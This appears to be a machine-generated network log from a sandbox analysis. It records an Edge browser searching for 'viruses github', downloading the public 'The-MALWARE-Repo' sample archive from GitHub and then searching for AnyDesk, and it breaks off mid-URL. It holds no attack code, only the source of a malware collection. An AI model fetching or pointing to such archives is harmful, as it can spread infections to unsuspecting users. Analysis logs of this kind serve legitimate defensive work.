GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=91&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=98&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200
92.123.128.162:443

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=93&pcl=fffffa&r=0&o=6&pid=1.2

tls, http

msedge.exe

4.5kB
7.7kB
36
38

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=93&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200
92.123.128.162:443

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=94&pcl=fffffa&r=0&o=6&pid=1.2

tls, http

msedge.exe

4.5kB
7.7kB
36
38

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=94&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200
92.123.128.162:443

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=99&pcl=fffffa&r=0&o=6&pid=1.2

tls, http

msedge.exe

7.0kB
9.2kB
39
41

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=95&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=99&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200
92.123.128.189:443

https://www.bing.com/qbox?query=an&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=36b717de75bd4c4da73a50f9f7f1963d&oit=1&cp=2&pgcl=4

tls, http

msedge.exe

28.6kB
6.1kB
40
42

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350712%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144350821%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221624%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144350824%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222090%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144350824%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144350847%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350883%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/ck/a?!&&p=90a1343f2bd13c44JmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMQ&ptn=3&ver=2&hsh=3&fclid=05879add-3ef8-6d54-0f58-8fd23fdb6c78&psq=viruses+github&u=a1aHR0cHM6Ly9naXRodWIuY29tL0RhMmRhbHVzL1RoZS1NQUxXQVJFLVJlcG8jOn46dGV4dD1HaXRIdWIgLSBEYTJkYWx1cy9UaGUtTUFMV0FSRS1SZXBvOiBBIHJlcG9zaXRvcnkgZnVsbCBvZiBtYWx3YXJlIHNhbXBsZXMuIFRoaXM&ntb=1

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.TabFocusChanged&DATA=%5B%7B%22T%22%3A%22CI.TabFocusChanged%22%2C%22TS%22%3A1728144443407%2C%22Name%22%3A%22visible%22%2C%22FID%22%3A%22TabFocused%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.tweenToggle%22,%22FID%22:%22CI%22,%22Name%22:%22showTools%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/qbox?query=an&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=36b717de75bd4c4da73a50f9f7f1963d&oit=1&cp=2&pgcl=4
92.123.128.189:443

https://www.bing.com/qbox?query=anyd&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=b93ec986adbf4d969f07d902475c2682&oit=1&cp=4&pgcl=4

tls, http

msedge.exe

14.4kB
4.2kB
25
27

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144350790%2C%22Name%22%3A%22AnimationLoad%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/qbox?query=any&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=0a931cfbbe0a46b9ae5bb50aca72d89c&oit=1&cp=3&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=anyd&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=b93ec986adbf4d969f07d902475c2682&oit=1&cp=4&pgcl=4
20.26.156.215:443

https://github.com/Da2dalus/The-MALWARE-Repo/archive/refs/heads/master.zip

tls, http2

msedge.exe

5.6kB
109.5kB
64
108

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/security/overall-count

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/spoofed_commit_check/02066b55d8b8271b199dbd1eb1a9b31fd38dfe71

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/hovercards/citation/sidebar_partial?tree_name=master

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/used_by_list

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/refs?type=branch

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/latest-commit/master

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/tree-commit-info/master

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/branch-count

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/tag-count

HTTP Request

GET https://github.com/manifest.json

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/archive/refs/heads/master.zip

HTTP Response

302
20.26.156.215:443

github.com

tls

msedge.exe

1.2kB
4.3kB
13
14
185.199.109.133:443

https://avatars.githubusercontent.com/u/63458929?v=4&size=40

tls, http2

msedge.exe

3.6kB
12.2kB
52
56

HTTP Request

GET https://avatars.githubusercontent.com/u/63458929?s=64&v=4

HTTP Request

GET https://avatars.githubusercontent.com/u/123590232?s=64&v=4

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://avatars.githubusercontent.com/u/63458929?v=4&size=40

HTTP Response

200
185.199.109.133:443

avatars.githubusercontent.com

tls

msedge.exe

701 B
670 B
4
4
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

701 B
1.2kB
4
4
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

747 B
1.7kB
5
5
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

747 B
3.2kB
5
6
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

747 B
3.7kB
5
6
185.199.111.154:443

https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-d06d275cbddc.js

tls, http2

msedge.exe

33.7kB
1.0MB
494
829

HTTP Request

GET https://github.githubassets.com/assets/light-3e154969b9f9.css

HTTP Request

GET https://github.githubassets.com/assets/global-a2362f933f32.css

HTTP Request

GET https://github.githubassets.com/assets/repos-overview.47b2222c697daf78496d.module.css

HTTP Request

GET https://github.githubassets.com/assets/primer-fefb1a332c28.css

HTTP Request

GET https://github.githubassets.com/assets/github-d1e3b63864f7.css

HTTP Request

GET https://github.githubassets.com/assets/code-016b94b6763c.css

HTTP Request

GET https://github.githubassets.com/assets/repository-0f7cf89e325a.css

HTTP Request

GET https://github.githubassets.com/assets/primer-react.a38d782b719dc67594c9.module.css

HTTP Request

GET https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css

HTTP Request

GET https://github.githubassets.com/assets/dark-9c5b7a476542.css

HTTP Request

GET https://github.githubassets.com/assets/primer-primitives-4cf0d59ab51a.css

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_paths_index_ts-6d26e38db34f.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-d56e55-4533ead6a048.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-7aa5ebad499a.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_analytics-provider_analytics-provider_ts-ui_packages_aria-live_aria-live_ts-ui_pa-17c1b5-15d543eaf9e0.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_query_js-node_modules_tanstack_react-qu-e4a133-25f9fad0b763.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-02f89169f75f.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_commit-checks-status_index_ts-ui_packages_use-analytics_use-analytics_ts-ui_packa-51deed-5473b509efc1.js

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_code-view-shared_components_SharedMarkdownContent_tsx-ui_packages_copy-to-clipboa-b2118b-53fd9e2a3d94.js

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-53e534-f556cfc1bed5.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_use-alive_use-alive_ts-ui_packages_code-dropdown-button_components_CodeDropdownBu-f58329-36fafde1f7a9.js

HTTP Request

GET https://github.githubassets.com/assets/repos-overview-63b70e068491.js

HTTP Request

GET https://github.githubassets.com/assets/wp-runtime-9bee736947cd.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-56729c905fe2.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-76666ec8c39f.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-aabfa4ec15fe.js

HTTP Request

GET https://github.githubassets.com/assets/environment-d0410c4d2a74.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-6ce195-53781cbc550f.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-e40ed7658a74.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-1f651a-0cff18664748.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-21f158-7d460d5f7704.js

HTTP Request

GET https://github.githubassets.com/assets/github-elements-c8c1f3c48c7e.js

HTTP Request

GET https://github.githubassets.com/assets/element-registry-be4dfc8273c2.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-037ad60-8582b70cd5a9.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-3f4401350bd7.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-ab87c1d6c5c8.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-6faacedf87fe.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js

HTTP Request

GET https://github.githubassets.com/assets/behaviors-f5e67dbe7c99.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js

HTTP Request

GET https://github.githubassets.com/assets/notifications-global-54f34167118d.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-96e856171702.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-00df584d9e79.js

HTTP Request

GET https://github.githubassets.com/assets/codespaces-3bf9ff7d0f93.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-cdab1b-03eba6ef6933.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-a6774a3bb897.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--b0e14d-a57a4c842e6f.js

HTTP Request

GET https://github.githubassets.com/assets/repositories-d27a99fb2b65.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-e73b311a14f1.js

HTTP Request

GET https://github.githubassets.com/assets/code-menu-ab2b8d126a2a.js

HTTP Request

GET https://github.githubassets.com/assets/primer-react-c2abd9301d38.js

HTTP Request

GET https://github.githubassets.com/assets/react-core-38a70e7c3127.js

HTTP Request

GET https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js

HTTP Request

GET https://github.githubassets.com/assets/octicons-react-45c3a19dd792.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-41da55-1851acd376ff.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-46e1f260cd63.js

HTTP Request

GET https://github.githubassets.com/assets/notifications-subscriptions-menu-74dc9402b497.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hotkey_dist_index_js-no-d67c7f-bd7d077cdcb1.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-4f6b14c4cf9a.js

HTTP Request

GET https://github.githubassets.com/assets/keyboard-shortcuts-dialog-0a7cffcc5a1e.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js

HTTP Request

GET https://github.githubassets.com/assets/sessions-f3ddee0032e4.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-90c1b002fec5.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-1077a1578034.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-a18fad-9a094f77afd1.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-1546dc8c42cb.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-27b18f5e26b6.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-ui_packages_trusted-types-policies_policy_ts--7cc11e-7e08c316f09f.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-28d1a6bc19ca.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-331bb20ac2eb.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-600f89-7a5d1736c364.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-eba7ee3409f2.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-1a3a07f835f6.js

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-d06d275cbddc.js

HTTP Response

200

HTTP Response

200
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

747 B
4.3kB
5
6
185.199.111.154:443

https://github.githubassets.com/favicons/favicon.png

tls, http2

msedge.exe

3.9kB
26.1kB
57
65

HTTP Request

GET https://github.githubassets.com/favicons/favicon.svg

HTTP Request

GET https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/favicons/favicon.png

HTTP Response

200
140.82.112.21:443

https://collector.github.com/github/collect

tls, http2

msedge.exe

8.4kB
8.0kB
34
37

HTTP Request

POST https://collector.github.com/github/collect

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204
140.82.112.21:443

collector.github.com

tls

msedge.exe

747 B
3.7kB
5
6
20.26.156.210:443

https://api.github.com/_private/browser/stats

tls, http2

msedge.exe

4.3kB
8.0kB
23
29

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200
20.26.156.216:443

https://codeload.github.com/Da2dalus/The-MALWARE-Repo/zip/refs/heads/master

tls, http2

msedge.exe

3.5MB
218.7MB
76280
156790

HTTP Request

GET https://codeload.github.com/Da2dalus/The-MALWARE-Repo/zip/refs/heads/master

HTTP Response

200
2.19.117.148:443

aefd.nelreports.net

tls

msedge.exe

1.2kB
993 B
10
10
20.26.156.210:443

https://api.github.com/_private/browser/stats

tls, http2

msedge.exe

2.6kB
6.6kB
17
20

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200

HTTP Response

200
20.26.156.210:443

api.github.com

tls

msedge.exe

851 B
3.8kB
6
7
92.123.128.132:443

https://www.bing.com/fd/ls/lsp.aspx

tls, http

msedge.exe

44.2kB
9.6kB
63
68

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461085%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=4B36F2F1B3E84114BE48F204E3D5D175&iid=.5092&ptn=Web&ep=0&iconpl=1

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461355%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144462678%2C%22Name%22%3A%22AnimationLoad%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204
92.123.128.146:443

th.bing.com

tls

msedge.exe

1.1kB
993 B
10
10
92.123.128.132:443

https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=4B36F2F1B3E84114BE48F204E3D5D175&ID=SERP,5132.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Da25e0edae602c85aJmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMg%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D05879add-3ef8-6d54-0f58-8fd23fdb6c78%26psq%3Danydesk%26u%3Da1aHR0cHM6Ly93d3cuYW55ZGVzay5jb20vIzp-OnRleHQ9RGlzY292ZXIgQW55RGVzaywgdGhlIHNlY3VyZSAmIGludHVpdGl2ZSByZW1vdGUgZGVza3RvcCBzb2Z0d2FyZSwgYW5k%26ntb%3D1

tls, http

msedge.exe

15.9kB
7.8kB
42
46

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=4B36F2F1B3E84114BE48F204E3D5D175&IID=SERP.5060&q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22hotels%22%2C%22FID